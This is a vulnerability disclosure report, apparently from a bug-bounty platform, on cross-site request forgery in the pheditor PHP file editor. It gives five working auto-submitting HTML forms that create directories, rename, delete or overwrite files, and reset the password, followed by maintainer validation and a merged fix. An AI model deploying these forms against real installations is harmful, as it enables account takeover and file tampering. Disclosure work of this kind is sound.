Cross-Site Request Forgery (CSRF) in pheditor/pheditor

Valid

Reported on

Sep 14th 2021


Description

Cross-Site Request Forgery (CSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they’re currently authenticated. With a little help of social engineering (such as sending a link via email or chat), an attacker may trick the users of a web application into executing actions of the attacker’s choosing. If the victim is a normal user, a successful CSRF attack can force the user to perform state changing requests like transferring funds, changing their email address, and so forth. If the victim is an administrative account, CSRF can compromise the entire web application.

https://github.com/pheditor/pheditor/ is vulnerable to CSRF as shown below:

Impact

The vulnerability allows an attacker to execute commands on the server that is running an application, and typically fully compromise the application and all its data.

Occurences

CSRF Make dir

Login to phpeditor Create a new file csrf_makedir.html in any location with the following content:

<html>
    <body onload="document.forms[0].submit()">
    <form enctype="application/x-www-form-urlencoded" method="POST" action="http://localhost/pheditor-2/pheditor.php">
        <table>
            <tr><td>action</td><td><input type="text" value="make-dir" name="action"></td></tr>
            <tr><td>dir</td><td><input type="text" value="/csrf-new-dir" name="dir"></td></tr>
        </table>
        <input type="submit" value="http://localhost/pheditor-2/pheditor.php">
    </form>
    </body>
</html>

Open csrf_makedir.html file in a browser and observe a new dir csrf-new-dir has been created.

CSRF Rename file

Login to phpeditor Create a new file csrf_rename.html in any location with the following content:

<html>
    <body onload="document.forms[0].submit()">
    <form enctype="application/x-www-form-urlencoded" method="POST" action="http://localhost/pheditor-2/pheditor.php">
        <table>
            <tr><td>action</td><td><input type="text" value="rename" name="action"></td></tr>
            <tr><td>path</td><td><input type="text" value="/composer.json" name="path"></td></tr>
            <tr><td>name</td><td><input type="text" value="renamed.json" name="name"></td></tr>
        </table>
        <input type="submit" value="http://localhost/pheditor-2/pheditor.php">
    </form>
    </body>
</html>

Open csrf_rename.html file in a browser and observe composer.json was renamed to renamed.json

CSRF PASSWORD RESET

Login to phpeditor Create a new file csrf_reset.html in any location with the following content:

<html>
    <body onload="document.forms[0].submit()">
    <form enctype="application/x-www-form-urlencoded" method="POST" action="http://localhost/pheditor-2/pheditor.php">
        <table>
            <tr><td>action</td><td><input type="text" value="password" name="action"></td></tr>
            <tr><td>password</td><td><input type="text" value="test" name="password"></td></tr>
        </table>
        <input type="submit" value="http://localhost/pheditor-2/pheditor.php">
    </form>
    </body>
</html>

Open csrf_reset.html file in a browser and observe the password changed to test.

CSRF delete file

Login to phpeditor Create a new file csrf_delete.html in any location with the following content:

<html>
    <body onload="document.forms[0].submit()">
    <form enctype="application/x-www-form-urlencoded" method="POST" action="http://localhost/pheditor-2/pheditor.php">
        <table>
            <tr><td>action</td><td><input type="text" value="delete" name="action"></td></tr>
            <tr><td>path</td><td><input type="text" value="/composer.json" name="path"></td></tr>
        </table>
        <input type="submit" value="http://localhost/pheditor-2/pheditor.php">
    </form>
    </body>
</html>

Open csrf_delete.html file in a browser and observe the file composer.json was removed.

CSRF Save file

Login to phpeditor Create a new file csrf_save.html in any location with the following content:

<html>
    <body onload="document.forms[0].submit()">
    <form enctype="application/x-www-form-urlencoded" method="POST" action="http://localhost/pheditor-2/pheditor.php">
        <table>
            <tr><td>action</td><td><input type="text" value="save" name="action"></td></tr>
            <tr><td>file</td><td><input type="text" value="/composer.json" name="file"></td></tr>
            <tr><td>data</td><td><input type="text" value="CSRF TEST" name="data"></td></tr>
        </table>
        <input type="submit" value="http://localhost/pheditor-2/pheditor.php">
    </form>
    </body>
</html>

Open csrf_save.html file in a browser and observe the content of composer.json has changed.

Ziding Zhang
2 months ago

Admin


Hey hitisec, I've emailed the maintainers for you.

We have contacted a member of the pheditor team and are waiting to hear back 2 months ago
pheditor/pheditor maintainer validated this vulnerability 2 months ago
hitisec has been awarded the disclosure bounty
The fix bounty is now up for grabs
pheditor/pheditor maintainer confirmed that a fix has been merged on 69a79e 2 months ago
The fix bounty has been dropped
pheditor.php#L238-L256 has been validated
pheditor.php#L333-L365 has been validated
pheditor.php#L269-L286 has been validated
pheditor.php#L290-L326 has been validated
pheditor.php#L204-L232 has been validated